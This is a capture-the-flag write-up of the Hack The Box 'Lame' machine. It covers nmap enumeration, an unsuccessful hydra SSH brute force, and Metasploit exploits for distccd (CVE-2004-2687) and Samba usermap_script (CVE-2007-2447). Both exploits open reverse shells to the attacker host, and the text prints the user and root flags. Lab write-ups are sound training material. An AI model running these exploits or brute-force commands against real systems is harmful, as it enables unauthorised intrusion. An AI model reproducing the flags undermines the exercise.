Lame
Starting information
Machine IP : 10.10.10.3 System : Linux
Network enumeration
I start by modifying my /etc/hosts
file to avoid writing the IP everytime :
10.10.10.3 lame
Then I look for open ports :
nmap lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Now that I know I have some interesting ports opened, I run nmap with its scripts:
nmap lame -A -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.81 seconds
The first thing I see is that anonymous login is authorised on the FTP server. Unfortunately no folders are visible and trying to access them directly returns an error. The anonymous login seems to be a dead end.
Not sure where to go next I try to bruteforce the password for the ssh user admin
but with no avail:
hydra -l admin -P ~/Resources/SecurityTools/IntruderPayloads/FuzzLists/passwords_quick.txt lame ssh -t 4
I end up doing a full port scan of the target in case I missed something important and start an OpenVAS scan in parallel:
nmap -p- lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:27 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.033s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
DistCCD
distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. distcc can run over either TCP or a connection command such as ssh.
My OpenVAS scan is not yet finished that I can see two high vulnerabilities, one of which is a remote code execution targeting distccd: CVE-2004-2687. An exploit for this CVE is available in Metasploit, let’s fire it up.
First I make sure postgresql is started.
service postgresql start
Then I start Mestasploit.
msfconsole
Here is the exploit available for distcc
:
msf5 > search distccd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
I select the exploit with use
:
msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) >
For the options I just need to specify the host and the port:
msf5 exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
I set the RHOSTS option with the set
command and check that the option is correctly set:
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
Great! Everything seems to be properly configured, now I can try the exploit:
msf5 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP double handler on 10.10.14.7:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4WOw9Ir4tJSBhdJM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4WOw9Ir4tJSBhdJM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:53376) at 2019-09-22 18:15:32 +0200
ls
5140.jsvc_up
Looks like it worked!
User flag
Now that I have access to a shell on the machine, finding the user flag shouldn’t be too much of hassle.
I look a the home
directories and search for the file user.txt
cd /home
ls
ftp
makis
service
user
ls makis
user.txt
cat makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
Root flag
I retrieving the user flag was a piece of cake, I suspect that the root flag might be a bit more difficult.
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat /root/root.txt
cat: /root/root.txt: Permission denied
I don’t have the permissions to access root.txt
. I will have to find a privilege escalation.
From my OpenVAS scan I can see that Samba MS-RPC is vulnerable to a Remote Shell Command Execution Vulnerability: CVE-2007-2447.
The exploit is available in Mestasploit:
msf5 > search 2007-2447
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Now I just have to configure it and run it:
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.7:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gnLmqtNCReENz5i3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gnLmqtNCReENz5i3\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:39128) at 2019-09-22 18:35:52 +0200
id
uid=0(root) gid=0(root)
It looks like I am root. Let’s see if I can get the root flag:
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat /root/root.txt
92caac3be140ef409e45721348a4e9df